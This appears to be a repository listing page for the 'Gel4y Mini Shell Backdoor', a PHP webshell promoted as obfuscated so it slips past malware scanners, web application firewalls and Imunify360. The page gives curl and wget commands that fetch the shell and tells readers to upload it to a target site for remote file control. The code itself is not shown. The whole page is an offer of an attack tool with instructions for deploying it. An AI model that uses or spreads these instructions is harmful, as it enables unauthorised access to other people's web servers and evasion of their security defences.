PhpDev.App
22XploiterCrew-Team/Gel4y-Mini-Shell-Backdoor

22XploiterCrew-Team/Gel4y-Mini-Shell-Backdoor

Stars: 105

Forks: 64

Pull Requests: 0

Issues: 4

Watchers: 3

Last Updated: 2023-08-02 22:28:36

A webshell that can bypass some system security, all code has been obfuscated to bypass malware scans freely.

License: MIT License

Languages: PHP

https://raw.githubusercontent.com/22XploiterCrew-Team/Gel4y-Mini-Shell-Backdoor/1.x.x/gel4y.php

Gel4y Mini Shell Backdoor

A webshell that can bypass some system security, all code has been obfuscated to bypass malware scans freely.

Summary

Gel4y Webshell is a backdoor that was built using the PHP programming language with the PHP procedural method in stealth mode where the file size is only <20KB, using the nano shell method so it easily escapes virus scanning. Every PHP function has been obfuscated to avoid some firewall systems (WAF) blocking some PHP functions that are considered dangerous.

How To Use

You only need to download the files in this repo, there are several easy ways that you might try

  • cURL curl https://raw.githubusercontent.com/22XploiterCrew-Team/Gel4y-Mini-Shell-Backdoor/1.x.x/gel4y.php -o gel4y.php
  • wget wget https://raw.githubusercontent.com/22XploiterCrew-Team/Gel4y-Mini-Shell-Backdoor/1.x.x/gel4y.php

the method above will download and save to your computer, you only need to upload the webshell to the target site that you have and call it according to the name of the webshell file you downloaded.

ex: https://server.com/gel4y.php.

Features [UPDATED]

  • Obfuscated Code (not a feature in webshell)
  • Multiple File Upload
  • Create Folder and File
  • File Download

Bypassed

  • 403 Forbidden
  • 406 Not Acceptable (according to luck :>)
  • Imunify360 (not always successful, only 70% chance of success)

Preview

Using the well-known css framework, Bootstrap version 4, so that the resulting display will adjust to your platform or more often it is called a responsive display.

Thank's To

Thank you for the support given, we got references in making this backdoor from our friends, including:

  • IndoXploit
  • Indosec
  • Marijuana Shell

!!!

If there is an error in this webshell, please contribute with us.